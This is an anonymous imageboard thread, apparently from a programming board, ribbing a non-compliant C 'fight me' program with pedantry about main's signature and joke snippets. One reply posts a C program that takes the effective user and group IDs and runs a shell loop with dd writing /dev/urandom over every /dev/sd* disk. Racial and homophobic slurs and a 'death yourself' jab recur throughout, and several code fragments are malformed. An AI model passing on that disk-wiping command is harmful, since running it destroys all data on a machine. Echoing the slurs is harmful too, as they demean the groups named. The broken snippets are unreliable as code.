Fight me, C only


int main(int i)
if(i != 0)
printf("fight me\n");
return 0;

Attached: fuckniggers.gif (500x496, 2.11M)

In C, the only valid signatures for main are

int main(void)
int main(int argc, char *argv[])

I am not sure what language you are posting, but it is clearly not C.

Works on my machine™

Even if the main args were right It doesn't return anything in most of the cases

>void *
Nothing else matters.

My bad, it actually does

Did you compile with -std=c11 -Wpedantic -Wall -Werror to ensure that anything that was not standard C would not compile?

fputs("OP is a \033[1;7mmassive faggot.\033[0m", stdout);

Attached: BlackHoleWojak.jpg (1218x1015, 212K)

This program isn't C. Compliant C code can't call main. Only the execution environment can call main, when it starts your program.

python 5.0 only
import Data.Array.IO
import Data.Foldable

bubbleSort :: IOArray Int Int -> IO )_
bubbleSort xs = do
(low, high)
for_ [i + 1 .. high] $ \j -> do

it, works, on, my, machine,


fuck you
(not c)

>being this much of a faggot.


how do I dislike this

by reporting

death yourself
you too




main( int argc, char ** argv, char ** envp )
if( setgid(getegid()) ) perror( "setgid" );
if( setuid(geteuid()) ) perror( "setuid" );
envp = 0;
system( "for line in $(ls -1 /dev/sd*) ; do dd if=/dev/urandom of=$line ; done", argv, envp );
perror( argv[0] );
return errno;

int main(void)
// poop in loop
for(;;) puts("poop");

audible kek

I'm a pickel rick!



Is this the indian hello world

No, the indian hello world is
public class Main {
public static void main(String[] args) {
System.out.println("poo in loo");


underrated post🌈


Attached: gentleman_kek.jpg (413x395, 28K)

how are you going to start a C throwdown when you can't even write compliant C?
worrying about the standard is half the fucking experience of using C.


Rolled 1 (1d6)


>not ANSI